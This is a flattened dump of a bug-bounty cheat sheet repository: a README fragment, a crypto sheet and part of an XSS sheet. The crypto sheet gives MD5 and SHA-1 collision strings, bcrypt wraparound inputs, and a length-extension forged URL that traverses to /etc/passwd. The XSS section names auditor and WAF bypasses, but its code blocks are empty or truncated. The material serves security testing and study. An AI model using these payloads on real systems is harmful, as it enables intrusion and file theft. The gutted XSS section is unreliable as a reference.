already been reported. 34 | 35 | # Style Guide 36 | 37 | We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not). 38 | 39 | - Cheat sheet titles should start with `##`. 40 | - Subheadings should be made bold. (`**Subheading**`) 41 | - Add newlines after subheadings and code blocks. 42 | - Code blocks should use three backticks. (```) 43 | - Make sure to use syntax highlighting whenever possible. 44 | 45 | # Contributors 46 | 47 | - [EdOverflow](https://github.com/EdOverflow) 48 | - [GerbenJavado](https://github.com/GerbenJavado) 49 | - [jon_bottarini](https://github.com/BlueTower) 50 | - [sp1d3r](https://github.com/sp1d3r) 51 | - [yasinS](https://github.com/yasinS) 52 | - [neutrinoguy](https://github.com/neutrinoguy) 53 | - [kuromatae](https://github.com/kuromatae) 54 | - [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) 55 | -------------------------------------------------------------------------------- /cheatsheets/crypto.md: -------------------------------------------------------------------------------- 1 | ## Crypto 2 | 3 | **MD5 Collision Strings** 4 | 5 | ``` 6 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 7 | ``` 8 | 9 | ``` 10 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2 11 | ``` 12 | 13 |
14 | URL decode strings. 15 | 
4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2
16 | 
4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2
17 |

18 | 19 | **SHA-1 Collision Strings** 20 | 21 | ``` 22 | %25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1 23 | ``` 24 | 25 | ``` 26 | %25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1 27 | ``` 28 | 29 |
30 | URL decode strings. 31 | 
255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017F46DC93A6B67E013B029AAA1DB2560B45CA67D688C7F84B8C4C791FE02B3DF614F86DB1690901C56B45C1530AFEDFB76038E972722FE7AD728F0E4904E046C230570FE9D41398ABE12EF5BC942BE33542A4802D98B5D70F2A332EC37FAC3514E74DDC0F2CC1A874CD0C78305A21566461309789606BD0BF3F98CDA8044629A1
32 | 
255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017346DC9166B67E118F029AB621B2560FF9CA67CCA8C7F85BA84C79030C2B3DE218F86DB3A90901D5DF45C14F26FEDFB3DC38E96AC22FE7BD728F0E45BCE046D23C570FEB141398BB552EF5A0A82BE331FEA48037B8B5D71F0E332EDF93AC3500EB4DDC0DECC1A864790C782C76215660DD309791D06BD0AF3F98CDA4BC4629B1
33 |

34 | 35 | **Bcrypt (BSD) Wraparound Bug** 36 | 37 | `$2a$` Bcrypt hashes were vulnerable to a wraparound bug where the first string in the list below would output the same hash as the next strings. 38 | 39 | ``` 40 | 000000000000000000000000000000000000000000000000000000000000000000000000 41 | ``` 42 | 43 | ``` 44 | 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234 45 | ``` 46 | 47 | ``` 48 | 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 49 | ``` 50 | 51 | **Length extension attack** 52 | 53 | In cryptography and computer security, a length extension attack is a type of attack where an attacker can use `Hash(message1)` and the length of `message1` to calculate `Hash(message1 ∥ message2)` for an attacker-controlled `message2`. 54 | 55 | In Summary: Given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix. 56 | 57 | An example: 58 | 59 | ``` 60 | http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9 61 | ``` 62 | 63 | ``` 64 | http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00 65 | 66 | %00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00 67 | 68 | %00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5 69 | ``` 70 | A related HackerOne report: https://hackerone.com/reports/251572 71 | 72 | Tool to extend a hash: https://github.com/iagox86/hash_extender 73 | 74 | More details about the attack: 75 | 76 | https://www.whitehatsec.com/blog/hash-length-extension-attacks/ 77 | https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks 78 | -------------------------------------------------------------------------------- /cheatsheets/xss.md: -------------------------------------------------------------------------------- 1 | ## XSS 2 | 3 | **Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm) 4 | 5 | ```html 6 | 7 | ``` 8 | 9 | **Chrome < v60 beta XSS-Auditor Bypass** 10 | 11 | ```html 12 | 51 | ``` 52 | 53 | **Wordfence XSS Bypasses** 54 | 55 | ```html 56 | >
" 61 | ``` 62 | 63 | ```html 64 | >> 65 | ``` 66 | 67 | **Incapsula WAF Bypasses** by [@i_bo0om](https://twitter.com/i_bo0om) 68 | 69 | ```html 70 |